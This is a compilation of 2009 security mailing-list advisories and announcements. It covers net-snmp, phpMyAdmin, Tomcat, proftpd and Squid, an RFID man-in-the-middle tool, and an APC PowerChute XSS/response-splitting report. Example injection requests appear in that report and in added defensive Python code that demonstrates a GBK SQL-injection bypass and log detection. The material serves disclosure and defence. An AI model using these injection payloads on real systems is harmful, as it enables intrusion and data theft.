Re: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
On 2009-02-26 Vladimir '3APA3A' Dubrovin wrote:
> --Thursday, February 26, 2009, 7:40:50 PM, you wrote to
> bugtraq@securityfocus.com:
>
> DSRG> Application: APC PowerChute Network Shutdown's Web Interface
> DSRG> Vendor URL: http://www.apc.com/
> DSRG> Bug: XSS/Response Splitting
>
> DSRG> Solution: Use Firewall
>
> Just wonder: how can a firewall protect against XSS/response splitting?

You don't give the bad guys access to your UPS's web interface?

Regards
Ansgar Wiechers
--
"The Mac OS X kernel should never panic because, when it does, it
seriously inconveniences the user."
--http://developer.apple.com/technotes/tn2004/tn2118.html
Re: New site about security conferences : www.security-briefings.com
Please plan to join us for our 2009 Techno Security Conference in beautiful Myrtle Beach, SC, May 31 - June 3 at the Marriott Grande Dunes Resort. Our Eleventh Annual International Techno Security Conference promises to be THE international meeting place for IT Security professionals from around the world. We also have some great pre-conference and post-conference training from some of the leading companies in training. To learn more go to our website http://www.thetrainingco.com/
ANNOUNCE: RFIDIOt-0.1x release - February 2009
Hi All,

Well, it's been a busy month... thanks to pytey, I came across TikiTags,
which proved to be rather more interesting than they at first seemed...

http://hackerati.com/post/57314994/rfid-on-the-cheap-hacking-tikitag

These devices contain an NXP PN532 reader chip, which, it turns out, is
also capable of running in emulator mode (it is the chip used in a lot of
NFC mobile phones), and, after looking at documentation from NXP, I was
able to get this functionality working, and I'm delighted that NXP have
also agreed to allow me to release the code despite it being based on
information that was provided under NDA, so massive props to NXP for
supporting the open source security research community! :)

As a result, I'm able to release two new tools:

pn532emulate.py - sets up the emulator and processes one command.

pn532mitm.py - 'pn532 man-in-the-middle', which will drive two readers:
one as an emulator and one as a reader, and will log all traffic that
flows between them. Additionally, you can separate the reader and
emulator onto two different machines, and relay the traffic via TCP.

As always, this is very much a work in progress, and I know the error
handling is not perfect and needs tweaking. Low level command processing
is also slightly wacky, and will probably be re-written now I understand
what's going on a bit more... :)

I've also added a tool for reading HID ProxCard IDs - 'hidprox.py'

and I finally got around to writing some more detailed documentation,
which you can find here:

http://www.rfidiot.org/documentation.html

Homepage and download instructions etc. can be found here:

http://www.rfidiot.org/

Enjoy!

Adam
--
Adam Laurie                    Tel: +44 (0) 20 7993 2690
Suite 117                      Fax: +44 (0) 1308 867 949
61 Victoria Road
Surbiton                       mailto:a...@algroup.co.uk
Surrey
KT6 4JX                        http://rfidiot.org
[ MDVSA-2009:056 ] net-snmp
Mandriva Linux Security Advisory                         MDVSA-2009:056
http://www.mandriva.com/security/
___
Package : net-snmp
Date    : February 25, 2009
Affected: 2009.0
___
Problem Description:

A vulnerability has been identified and corrected in net-snmp:

The netsnmp_udp_fmtaddr function (snmplib/snmpUDPDomain.c) in net-snmp
5.0.9 through 5.4.2, when using TCP wrappers for client authorization,
does not properly parse hosts.allow rules, which allows remote attackers
to bypass intended access restrictions and execute SNMP queries, related
to source/destination IP address confusion. (CVE-2008-6123)

The updated packages have been patched to prevent this.
___
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123
___
Updated Packages:

Mandriva Linux 2009.0:
2009.0/i586/libnet-snmp15-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/i586/libnet-snmp-devel-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/i586/libnet-snmp-static-devel-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/i586/net-snmp-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/i586/net-snmp-mibs-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/i586/net-snmp-tkmib-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/i586/net-snmp-trapd-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/i586/net-snmp-utils-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/i586/perl-NetSNMP-5.4.2-2.2mdv2009.0.i586.rpm
2009.0/SRPMS/net-snmp-5.4.2-2.2mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
2009.0/x86_64/lib64net-snmp15-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/x86_64/lib64net-snmp-devel-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/x86_64/lib64net-snmp-static-devel-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/x86_64/net-snmp-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/x86_64/net-snmp-mibs-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/x86_64/net-snmp-tkmib-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/x86_64/net-snmp-trapd-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/x86_64/net-snmp-utils-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/x86_64/perl-NetSNMP-5.4.2-2.2mdv2009.0.x86_64.rpm
2009.0/SRPMS/net-snmp-5.4.2-2.2mdv2009.0.src.rpm
___
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
___
Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
BitDefender Internet Security XSS
Application: BitDefender Internet Security 2009
OS: Windows XP (all patches up to date)

--
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
--

Description

BitDefender Internet Security is security software that includes multiple
protections, for example anti-spam, anti-spyware, etc.

--

Vulnerability

The vulnerability is caused because when you scan a file, the antivirus
uses a Flash object to display the name of the file. With this you can
make a malformed rar or zip that contains a script, and when the AV scans
the file, it runs the script.

--

POC/EXPLOIT

The PoC is the video, because to make the PoC you need a virus file.
The XSS is this: http://video.google.com/videoplay?docid=-8346357281340486654

--
Juan Pablo Lopez Yacubian
Re: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Dear Digital Security Research Group,

--Thursday, February 26, 2009, 7:40:50 PM, you wrote to bugtraq@securityfocus.com:

DSRG> Application: APC PowerChute Network Shutdown's Web Interface
DSRG> Vendor URL: http://www.apc.com/
DSRG> Bug: XSS/Response Splitting

DSRG> Solution: Use Firewall

Just wonder: how can a firewall protect against XSS/response splitting?

--
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
[ MDVSA-2009:026-1 ] phpMyAdmin
Mandriva Linux Security Advisory                       MDVSA-2009:026-1
http://www.mandriva.com/security/
___
Package : phpMyAdmin
Date    : February 26, 2009
Affected: Corporate 4.0
___
Problem Description:

Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote
attackers to inject arbitrary web script or HTML by using the db script
parameter when the register_globals php parameter is enabled
(CVE-2008-4775).

Cross-site request forgery (CSRF) vulnerability in tbl_structure.php
allows remote attackers to perform SQL injection and execute arbitrary
code by using the table script parameter (CVE-2008-5621).

Multiple cross-site request forgery (CSRF) vulnerabilities in phpMyAdmin
allow remote attackers to perform SQL injection by using unknown vectors
related to the table script parameter (CVE-2008-5622).

This update provides the fix for these security issues.

Update:

The previous update packages weren't signed, this time they are.
___
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4775
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5621
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5622
___
Updated Packages:

Corporate 4.0:
corporate/4.0/i586/phpMyAdmin-2.11.9.4-0.2.20060mlcs4.noarch.rpm
corporate/4.0/SRPMS/phpMyAdmin-2.11.9.4-0.2.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
corporate/4.0/x86_64/phpMyAdmin-2.11.9.4-0.2.20060mlcs4.noarch.rpm
corporate/4.0/SRPMS/phpMyAdmin-2.11.9.4-0.2.20060mlcs4.src.rpm
___
[ MDVSA-2009:048-2 ] epiphany
Mandriva Linux Security Advisory                       MDVSA-2009:048-2
http://www.mandriva.com/security/
___
Package : epiphany
Date    : February 25, 2009
Affected: 2008.1
___
Problem Description:

Python has a variable called sys.path that contains all paths where
Python loads modules by using the import scripting procedure. A wrong
handling of that variable enables local attackers to execute arbitrary
code via Python scripting in the current Epiphany working directory
(CVE-2008-5985).

This update provides a fix for that vulnerability.

Update:

The previous update package was not built against the correct (latest)
libxulrunner-1.9.0.6 library (fixes #48163)
___
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5985
___
Updated Packages:

Mandriva Linux 2008.1:
2008.1/i586/epiphany-2.22.3-0.3mdv2008.1.i586.rpm
2008.1/i586/epiphany-devel-2.22.3-0.3mdv2008.1.i586.rpm
2008.1/SRPMS/epiphany-2.22.3-0.3mdv2008.1.src.rpm

Mandriva Linux 2008.1/X86_64:
2008.1/x86_64/epiphany-2.22.3-0.3mdv2008.1.x86_64.rpm
2008.1/x86_64/epiphany-devel-2.22.3-0.3mdv2008.1.x86_64.rpm
2008.1/SRPMS/epiphany-2.22.3-0.3mdv2008.1.src.rpm
___
[ MDVSA-2009:057 ] valgrind
Mandriva Linux Security Advisory                         MDVSA-2009:057
http://www.mandriva.com/security/
___
Package : valgrind
Date    : February 26, 2009
Affected: 2008.0, 2008.1, 2009.0
___
Problem Description:

A vulnerability has been identified and corrected in valgrind:

Untrusted search path vulnerability in valgrind before 3.4.0 allows
local users to execute arbitrary programs via a Trojan horse .valgrindrc
file in the current working directory, as demonstrated using a malicious
--db-command option. NOTE: the severity of this issue has been disputed,
but CVE is including this issue because execution of a program from an
untrusted directory is a common scenario. (CVE-2008-4865)

The updated packages have been patched to prevent this.
___
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4865
___
Updated Packages:

Mandriva Linux 2008.0:
2008.0/i586/valgrind-3.2.3-2.2mdv2008.0.i586.rpm
2008.0/SRPMS/valgrind-3.2.3-2.2mdv2008.0.src.rpm

Mandriva Linux 2008.0/X86_64:
2008.0/x86_64/valgrind-3.2.3-2.2mdv2008.0.x86_64.rpm
2008.0/SRPMS/valgrind-3.2.3-2.2mdv2008.0.src.rpm

Mandriva Linux 2008.1:
2008.1/i586/valgrind-3.3.0-3.1mdv2008.1.i586.rpm
2008.1/SRPMS/valgrind-3.3.0-3.1mdv2008.1.src.rpm

Mandriva Linux 2008.1/X86_64:
2008.1/x86_64/valgrind-3.3.0-3.1mdv2008.1.x86_64.rpm
2008.1/SRPMS/valgrind-3.3.0-3.1mdv2008.1.src.rpm

Mandriva Linux 2009.0:
2009.0/i586/valgrind-3.3.1-2.1mdv2009.0.i586.rpm
2009.0/SRPMS/valgrind-3.3.1-2.1mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
2009.0/x86_64/valgrind-3.3.1-2.1mdv2009.0.x86_64.rpm
2009.0/SRPMS/valgrind-3.3.1-2.1mdv2009.0.src.rpm
___
[security bulletin] HPSBGN02410 SSRT080135 rev.1 - HP Virtual Rooms Client Running on Windows, Remote Execution of Arbitrary Code
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01678405
Version: 1

HPSBGN02410 SSRT080135 rev.1 - HP Virtual Rooms Client Running on
Windows, Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon
as soon as possible.

Release Date: 2009-02-24
Last Updated: 2009-02-24

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Virtual
Rooms client running on Windows. The vulnerability could be exploited to
allow remote execution of arbitrary code.

References: CVE-2009-0208

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Virtual Rooms client v7.0 and earlier running on Windows

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference            Base Vector               Base Score
CVE-2009-0208    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

The Hewlett-Packard Company thanks Will Dormann of CERT/CC for reporting
this vulnerability to security-al...@hp.com

RESOLUTION

HP has provided HP Virtual Rooms client v7.0.1 or later to resolve this
vulnerability. The upgrade is available from: https://www.rooms.hp.com

HP Virtual Rooms client v7.0.1 can be installed by using the "Test your
setup" link at https://www.rooms.hp.com . Select "Test your setup" from
the right navigation bar and follow the instructions.

Note: Installing this new release will also apply the Windows registry
kill bit for CLSID {0032-9593-4264-8B29-930B3E4EDCCD}. The kill bit is
explained in Microsoft article KB240797 or subsequent.
http://support.microsoft.com/kb/240797 .

To completely remove HP Virtual Rooms (HPVR) from your system:

Use the HPVR cleaner to remove HP Virtual Rooms from your system. The
HPVR Cleaner will remove all HPVR executables and clear all registry
entries without the need to install the new version. Follow the
instructions under "Removing HPVR components" here:
https://www.rooms.hp.com/resources/ .

PRODUCT SPECIFIC INFORMATION
None

HISTORY
Version:1 (rev.1) - 24 February 2009 Initial release

Third Party Security Patches: Third party security patches that are to
be installed on systems running HP software products should be applied
in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support
channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.
To get the security-alert PGP key, please send an e-mail message as
follows:
  To: security-al...@hp.com
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security
Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL
categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system
selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit
Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to
is represented by the 5th and 6th characters of the Bulletin number in
the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently
to maintain system integrity. HP is continually reviewing and enhancing
the security features of software products to provide customers with
current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to
the attention of users of the affected HP products the important
security information contained in this Bulletin. HP recommends that all
users determine the applicability of this information to their
individual situations and take appropriate action. HP does not warrant
that this information is necessarily accura
[SECURITY] CVE-2008-4308: Tomcat information disclosure vulnerability
CVE-2008-4308: Tomcat information disclosure vulnerability

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
Tomcat 4.1.32 to 4.1.34
Tomcat 5.5.10 to 5.5.20
Tomcat 6.0.x is not affected
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected

Note: Although this vulnerability affects relatively old versions of
Apache Tomcat, it was only discovered and reported to the Apache Tomcat
Security team in October 2008. Publication of this issue was then
postponed until now at the request of the reporter.

Description:
Bug 40771 (https://issues.apache.org/bugzilla/show_bug.cgi?id=40771) may
result in the disclosure of POSTed content from a previous request. For
a vulnerability to exist the content read from the input stream must be
disclosed, eg via writing it to the response and committing the
response, before the ArrayIndexOutOfBoundsException occurs which will
halt processing of the request.

Mitigation:
Upgrade to:
4.1.35 or later
5.5.21 or later
6.0.0 or later

Example:
See original bug report for example of how to create the error condition.

Credit:
This issue was discovered by Fujitsu and reported to the Tomcat Security
Team via JPCERT.

References:
http://tomcat.apache.org/security.html

Mark Thomas
[DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-009

--link to original advisory --
http://www.dsecrg.com/pages/vul/show.php?id=82

Application:             APC PowerChute Network Shutdown's Web Interface
Vendor URL:              http://www.apc.com/
Bug:                     XSS/Response Splitting
Exploits:                YES
Reported:                20.10.2008
Vendor Response:         20.10.2008
Vendor Reference:        081020-000796
Solution:                Use Firewall
Date of Public Advisory: 26.02.2009
Author:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Linked XSS and Response Splitting vulnerabilities found in APC PowerChute
Network Shutdown's Web Interface.

Details
*******

1. Linked XSS

Vulnerability found in script /security/applet

vulnerable parameter - "referrer"

Example
*******

GET /security/applet?referrer=>"'>

2. Response Splitting

Vulnerability found in script contexthelp.

vulnerable parameter - "page"

Example
*******

GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0

response:

HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html

Solution
********

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539

A low-risk web interface vulnerability has been discovered in the
PowerChute Business Edition Shutdown Agent. This issue is scheduled to be
addressed in a release of the application. While the severity of this
vulnerability has been determined to be minimal, it is recommended that
users continue to ensure the highest level of protection possible
through the placement of PowerChute Business Edition behind a firewall.
References
**********

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539

About
*****

Digital Security is a leading IT security company in Russia, providing
information security consulting, audit and penetration testing services,
risk analysis and ISMS-related services and certification for ISO/IEC
27001:2005 and PCI DSS standards. Digital Security Research Group
focuses on web application and database security problems with
vulnerability reports, advisories and whitepapers posted regularly on
our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
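As an added example (not code from DSecRG's advisory or from APC's product), the following Python shows how the two sinks named in the advisory are handled safely on the server side, plus a check over constructed access-log lines that flags the two request shapes the advisory documents. The handler names, the help-page allowlist, the HTML template and the log lines are assumptions made for this illustration.

```python
"""Added example for DSECRG-09-009: safe handling of the two vulnerable
parameters and a log check for the request shapes the advisory shows.

Assumptions (not from the advisory): handler names, the allowlist of help
page names, the HTML template and the access-log lines are constructed.
"""
import html
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Allowlist for the help page name copied into Location:.  Rejecting
# everything outside it is stricter than stripping CR/LF and also keeps
# path traversal and open-redirect characters out of the header line.
PAGE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def contexthelp_redirect(page_param):
    """Return (status, headers) for /contexthelp?page=<page_param>.

    The vulnerable build decoded the parameter and wrote it straight into
    Location:, so %0d%0a became a new header line (DSECRG_HEADER in the
    advisory's response).  Here the decoded value must match the allowlist.
    """
    page = unquote(page_param)
    if not PAGE_NAME.match(page):
        return 400, [("Content-Type", "text/plain")]
    # quote() is a second line of defence: only unreserved characters reach
    # the header line even if the allowlist is relaxed later.
    return 302, [("Location", "help/english/" + quote(page, safe=""))]


def applet_page(referrer_param):
    """Render the /security/applet page with the referrer parameter
    HTML-escaped before it is reflected into an attribute value."""
    referrer = html.escape(unquote(referrer_param), quote=True)
    # Hypothetical template; the real page's markup is not in the advisory.
    return ('<html><body><applet code="Applet.class">'
            f'<param name="referrer" value="{referrer}"></applet>'
            '</body></html>')


# Constructed common-log-format lines; the second and third carry the
# advisory's two request patterns, the first is a benign help request.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Feb/2009:10:47:42 +0000] "GET /contexthelp?page=Foobar HTTP/1.0" 302 0
10.0.0.9 - - [26/Feb/2009:10:47:43 +0000] "GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0" 302 0
10.0.0.9 - - [26/Feb/2009:10:47:44 +0000] "GET /security/applet?referrer=%3E%22%27%3E HTTP/1.0" 200 512
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
HEADER_BREAK = re.compile(r"[\r\n]")
ATTR_BREAK = re.compile(r"""[<>"']""")


def suspicious_requests(log_text):
    """Return (reason, request_target) pairs for requests that carry CR/LF
    into the header sink or attribute-breaking characters into the
    reflected parameter.  parse_qs decodes %0d%0a, %3E etc. for us."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        target = m.group("target")
        parts = urlsplit(target)
        params = parse_qs(parts.query, keep_blank_values=True)
        if parts.path == "/contexthelp":
            if any(HEADER_BREAK.search(v) for v in params.get("page", [])):
                hits.append(("response-splitting", target))
        elif parts.path == "/security/applet":
            if any(ATTR_BREAK.search(v) for v in params.get("referrer", [])):
                hits.append(("reflected-xss", target))
    return hits


if __name__ == "__main__":
    print(contexthelp_redirect("Foobar"))
    print(contexthelp_redirect("Foobar?%0d%0aDSECRG_HEADER:testvalue"))
    print(applet_page("%3E%22%27%3E"))
    for reason, target in suspicious_requests(SAMPLE_LOG):
        print(reason, target)
```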
[USN-724-1] Squid vulnerability
===========================================================
Ubuntu Security Notice USN-724-1                 February 25, 2009
squid vulnerability
CVE-2009-0478
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  squid  2.7.STABLE3-1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Joshua Morin, Mikko Varpiola and Jukka Taimisto discovered that Squid
did not properly validate the HTTP version when processing requests. A
remote attacker could exploit this to cause a denial of service
(assertion failure).

Updated packages for Ubuntu 8.10:
[SECURITY] [DSA 1727-1] New proftpd-dfsg packages fix SQL injection vulnerabilities
- ------------------------------------------------------------------------
Debian Security Advisory DSA 1727-1                  secur...@debian.org
http://www.debian.org/security/                           Steffen Joeris
February 26th, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : proftpd-dfsg
Vulnerability  : SQL injection vulnerabilities
Problem type   : remote
Debian-specific: no
CVE Ids        : CVE-2009-0542 CVE-2009-0543

Two SQL injection vulnerabilities have been found in proftpd, a
virtual-hosting FTP daemon. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2009-0542

    Shino discovered that proftpd is prone to an SQL injection
    vulnerability via the use of certain characters in the username.

CVE-2009-0543

    TJ Saunders discovered that proftpd is prone to an SQL injection
    vulnerability due to insufficient escaping mechanisms, when multibyte
    character encodings are used.

For the stable distribution (lenny), these problems have been fixed in
version 1.3.1-17lenny1.

For the oldstable distribution (etch), these problems will be fixed soon.

For the testing distribution (squeeze), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 1.3.2-1.

We recommend that you upgrade your proftpd-dfsg package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
- --

Source archives:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-17lenny1.dsc
    Size/MD5 checksum:     1348 bb4118976a78b6eef4356123b4e322da
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-17lenny1.diff.gz
    Size/MD5 checksum:   102388 7873fdab33c5e044dce721300d496d7e
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1.orig.tar.gz
    Size/MD5 checksum:  2662056 da40b14c5b8ec5467505c98b4ee4b7b9

Architecture independent components:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-doc_1.3.1-17lenny1_all.deb
    Size/MD5 checksum:  1256300 f0e73bd54793839c802b3c3ce85bb123
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.1-17lenny1_all.deb
    Size/MD5 checksum:   194896 cda6edb78e4a5ab9c8a90cfdaeb19b32

AMD64 architecture:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny1_amd64.deb
    Size/MD5 checksum:   744914 4c09f5af5f825f0c068f3dce4a1c7a84
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny1_amd64.deb
    Size/MD5 checksum:   214334 eb8f6f56afda836f85f6d808a6086c6a
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny1_amd64.deb
    Size/MD5 checksum:   203878 8d13ce2c0d2c15eec496d3e014aa1ea3
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny1_amd64.deb
    Size/MD5 checksum:   203902 ce74fcf7e0f082fcf4454120e984a0c3

ARM architecture:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny1_arm.deb
    Size/MD5 checksum:   696884 cab353aa755852b2c07916f234268e39
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny1_arm.deb
    Size/MD5 checksum:   213832 faad0df7dab14fdca108c6370ae3edf0
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny1_arm.deb
    Size/MD5 checksum:   203260 3940f22df22db3ce6a3644a22b68e82b
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny1_arm.deb
    Size/MD5 checksum:   203448 35f6cb99d5f9886d74a8a1e72df36a2d

Intel IA-32 architecture:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny1_i386.deb
    Size/MD5 checksum:   688540 bdcbe2b33ed58bf474824c4639dcfb99
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny1_i386.deb
    Size/MD5 checksum:   212208 bcb4bce6c950fe4fd416fcf9e97b79f6
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny1_i386.deb
    Size/MD5 checksum:   203074 55e8334da716aeb8efe43803c8f71d00
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgs
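The advisory above says only that escaping was "insufficient" once multibyte encodings are involved. The following is an added example, not Debian's or ProFTPD's code, showing the mechanism behind that class of bug (the one CVE-2009-0543 names): a byte-wise escaper inserts a backslash before a quote, but under a multibyte charset such as GBK the attacker's lead byte and that backslash form one character, and the quote is left free. The naive escaper, the query template, the scanner and the username payload are all constructed for illustration; ProFTPD's mod_sql query does not look like this.

```python
"""Added example, not Debian's or ProFTPD's code: why escaping quotes one
byte at a time fails once the SQL connection uses a multibyte charset such
as GBK (the class of bug CVE-2009-0543 describes), and what a charset-aware
escaper does with the same input. The naive escaper, the query template and
the username payload are constructed for illustration."""
from __future__ import annotations

# Byte-wise escaping: ' -> \' and \ -> \\ without knowing the charset.
_NAIVE = {0x27: b"\\'", 0x5C: b"\\\\"}


def naive_escape(raw: bytes) -> bytes:
    return b"".join(_NAIVE.get(b, bytes([b])) for b in raw)


def build_query(escaped_username: bytes) -> bytes:
    # Constructed template standing in for the daemon's user lookup.
    return b"SELECT passwd FROM users WHERE userid='" + escaped_username + b"'"


def split_first_literal(query: bytes, charset: str) -> tuple[str, str]:
    """Decode the query as a server running with `charset` would, then scan
    the first single-quoted literal the way a SQL tokenizer does (backslash
    escapes and '' both continue the literal). Returns (literal, rest)."""
    text = query.decode(charset)
    i = text.index("'") + 1
    out = []
    while i < len(text):
        ch = text[i]
        if ch == "\\" and i + 1 < len(text):          # \x -> x, stay inside
            out.append(text[i + 1]); i += 2; continue
        if ch == "'":
            if text[i + 1:i + 2] == "'":              # '' -> ', stay inside
                out.append("'"); i += 2; continue
            return "".join(out), text[i + 1:]          # literal closed here
        out.append(ch); i += 1
    raise ValueError("unterminated string literal")


def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Escape at the character level in the connection charset. Input that
    is not valid in that charset (a lone GBK lead byte in front of a quote)
    is rejected instead of being passed through to the query."""
    try:
        text = raw.decode(charset)                     # strict decoding
    except UnicodeDecodeError as exc:
        raise ValueError(f"username is not valid {charset}") from exc
    return text.replace("\\", "\\\\").replace("'", "\\'").encode(charset)


def is_rejected(raw: bytes, charset: str) -> bool:
    try:
        charset_aware_escape(raw, charset)
    except ValueError:
        return True
    return False


# Constructed attacker username: a GBK lead byte, then a quote, then SQL.
PAYLOAD = b"\xbf' OR 1=1 -- "


def demo() -> dict[str, str]:
    """Text that ends up *outside* the username literal, per charset."""
    q = build_query(naive_escape(PAYLOAD))
    return {
        "latin-1": split_first_literal(q, "latin-1")[1],  # "" : escape held
        "gbk": split_first_literal(q, "gbk")[1],          # " OR 1=1 -- '"
    }


if __name__ == "__main__":
    for cs, tail in demo().items():
        print(f"{cs:8s} text outside the literal: {tail!r}")
    print("gbk rejects payload:", is_rejected(PAYLOAD, "gbk"))
```

Under a single-byte charset the backslash does its job and nothing leaks out of the literal; under GBK the bytes 0xBF 0x5C decode to one character and the attacker's SQL follows the closing quote. The charset-aware escaper refuses the payload outright because 0xBF followed by 0x27 is not a valid GBK sequence, while a genuine GBK username containing a quote is escaped correctly. Parameterised queries avoid the whole problem, since the username never becomes part of the statement text.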
Golabi CMS Remote File Inclusion Vulnerability
[wWw.CrazyAngel.iR] - [info-AT-CrazyAngel.iR]

[Golabi CMS Remote File Inclusion Vulnerability]

